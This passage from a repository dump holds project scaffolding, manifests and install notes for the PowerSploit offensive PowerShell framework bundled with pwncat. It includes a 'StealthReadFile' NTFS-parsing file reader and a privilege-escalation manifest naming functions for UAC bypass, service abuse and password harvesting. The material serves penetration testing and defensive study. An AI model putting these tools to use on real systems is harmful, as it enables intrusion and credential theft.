15 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32
16 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64
17 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64
18 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32
19 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32
20 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64
21 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : LogonUser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this LogonUser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your LogonUser application.
9 |
10 |
11 | LogonUser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | LogonUser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | LogonUser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named LogonUser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // LogonUser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | BOOL APIENTRY DllMain( HMODULE hModule,
5 | DWORD ul_reason_for_call,
6 | LPVOID lpReserved
7 | )
8 | {
9 | switch (ul_reason_for_call)
10 | {
11 | case DLL_PROCESS_ATTACH:
12 | case DLL_THREAD_ATTACH:
13 | case DLL_THREAD_DETACH:
14 | case DLL_PROCESS_DETACH:
15 | break;
16 | }
17 | return TRUE;
18 | }
19 |
20 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // logon.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include "targetver.h"
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 | #include
22 |
23 |
24 |
25 | // TODO: reference additional headers your program requires here
26 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NTFSParserDLL", "NTFSParserDLL\NTFSParserDLL.vcxproj", "{5E42B778-F231-4797-B7FD-7D5BCA9738D0}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.Build.0 = Debug|Win32
16 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.ActiveCfg = Debug|x64
17 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.Build.0 = Debug|x64
18 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.ActiveCfg = Release|Win32
19 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.Build.0 = Release|Win32
20 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.ActiveCfg = Release|x64
21 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParser/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParser/NTFSParser.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | #include "stdafx.h"
19 | #include "NTFS.h"
20 | #include "NTFS_Attribute.h"
21 | #include "NTFS_Common.h"
22 | #include "NTFS_DataType.h"
23 | #include "NTFS_FileRecord.h"
24 |
25 | using namespace std;
26 |
27 | typedef DWORD (CDECL *StealthReadFile_Func)(string, BYTE*, DWORD, ULONGLONG, DWORD*, ULONGLONG*);
28 |
29 | int _tmain(int argc, _TCHAR* argv[])
30 | {
31 | HMODULE parserDLLHandle = LoadLibraryA("NTFSParserDLL.dll");
32 | HANDLE procAddress = GetProcAddress(parserDLLHandle, "StealthReadFile");
33 |
34 | StealthReadFile_Func StealthReadFile = (StealthReadFile_Func)procAddress;
35 |
36 | DWORD buffSize = 1024*1024;
37 | BYTE* buffer = new BYTE[buffSize];
38 | DWORD bytesRead = 0;
39 | ULONGLONG bytesLeft = 0;
40 | DWORD ret = StealthReadFile("c:\\test\\test.txt", buffer, buffSize, 0, &bytesRead, &bytesLeft);
41 |
42 | cout << "Return value: " << ret << endl;
43 |
44 | ofstream myFile("c:\\test\\test2.txt", ios::out | ios::binary);
45 | myFile.write((char*)buffer, bytesRead);
46 |
47 | return 0;
48 | }
49 |
50 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : NTFSParser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this NTFSParser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your NTFSParser application.
9 |
10 |
11 | NTFSParser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | NTFSParser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | NTFSParser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named NTFSParser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 | // TODO: reference additional headers your program requires here
18 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | // dllmain.cpp : Defines the entry point for the DLL application.
19 | #include "stdafx.h"
20 |
21 | BOOL APIENTRY DllMain( HMODULE hModule,
22 | DWORD ul_reason_for_call,
23 | LPVOID lpReserved
24 | )
25 | {
26 | switch (ul_reason_for_call)
27 | {
28 | case DLL_PROCESS_ATTACH:
29 | case DLL_THREAD_ATTACH:
30 | case DLL_THREAD_DETACH:
31 | case DLL_PROCESS_DETACH:
32 | break;
33 | }
34 | return TRUE;
35 | }
36 |
37 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParserDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 | // TODO: reference additional headers your program requires here
19 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Exfiltration`
7 |
8 | To see the commands imported, type `Get-Command -Module Exfiltration`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/LICENSE:
--------------------------------------------------------------------------------
1 | PowerSploit is provided under the 3-clause BSD license below.
2 |
3 | *************************************************************
4 |
5 | Copyright (c) 2012, Matthew Graeber
6 | All rights reserved.
7 |
8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
9 |
10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
13 |
14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
15 |
16 |
17 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Mayhem/Mayhem.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Mayhem.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Mayhem Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md'
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Mayhem/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Mayhem folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Mayhem`
7 |
8 | To see the commands imported, type `Get-Command -Module Mayhem`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Persistence/Persistence.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Persistence.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '633d0f10-a056-41da-869d-6d2f75430195'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Persistence Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'Persistence.psm1', 'Persistence.psd1', 'Usage.md'
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Persistence/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Persistence`
7 |
8 | To see the commands imported, type `Get-Command -Module Persistence`
9 |
10 | For help on each individual command, Get-Help is your friend.
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/PowerSploit.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer -and !('Tests','docs' -contains $_.Name) } | % { Import-Module $_.FullName -DisableNameChecking }
2 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/PowerSploit.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.23107.0
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{F5034706-568F-408A-B7B3-4D38C6DB8A32}") = "PowerSploit", "PowerSploit.pssproj", "{6CAFC0C6-A428-4D30-A9F9-700E829FEA51}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.ActiveCfg = Release|Any CPU
15 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.Build.0 = Release|Any CPU
16 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Privesc/Privesc.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Privesc.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'
11 |
12 | # Author of this module
13 | Author = 'Will Schroeder (@harmj0y)'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Privesc Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = @(
26 | 'Get-ModifiablePath',
27 | 'Get-ProcessTokenGroup',
28 | 'Get-ProcessTokenPrivilege',
29 | 'Enable-Privilege',
30 | 'Add-ServiceDacl',
31 | 'Set-ServiceBinaryPath',
32 | 'Test-ServiceDaclPermission',
33 | 'Get-UnquotedService',
34 | 'Get-ModifiableServiceFile',
35 | 'Get-ModifiableService',
36 | 'Get-ServiceDetail',
37 | 'Invoke-ServiceAbuse',
38 | 'Write-ServiceBinary',
39 | 'Install-ServiceBinary',
40 | 'Restore-ServiceBinary',
41 | 'Find-ProcessDLLHijack',
42 | 'Find-PathDLLHijack',
43 | 'Write-HijackDll',
44 | 'Get-RegistryAlwaysInstallElevated',
45 | 'Get-RegistryAutoLogon',
46 | 'Get-ModifiableRegistryAutoRun',
47 | 'Get-ModifiableScheduledTaskFile',
48 | 'Get-UnattendedInstallFile',
49 | 'Get-WebConfig',
50 | 'Get-ApplicationHost',
51 | 'Get-SiteListPassword',
52 | 'Get-CachedGPPPassword',
53 | 'Write-UserAddMSI',
54 | 'Invoke-EventVwrBypass',
55 | 'Invoke-PrivescAudit',
56 | 'Get-System'
57 | )
58 |
59 | # List of all files packaged with this module
60 | FileList = 'Privesc.psm1', 'Get-System.ps1', 'PowerUp.ps1', 'README.md'
61 |
62 | }
63 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Privesc/Privesc.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Recon/Dictionaries/generic.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/data/PowerSploit/Recon/Dictionaries/generic.txt
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Recon/Recon.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/ScriptModification/ScriptModification.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
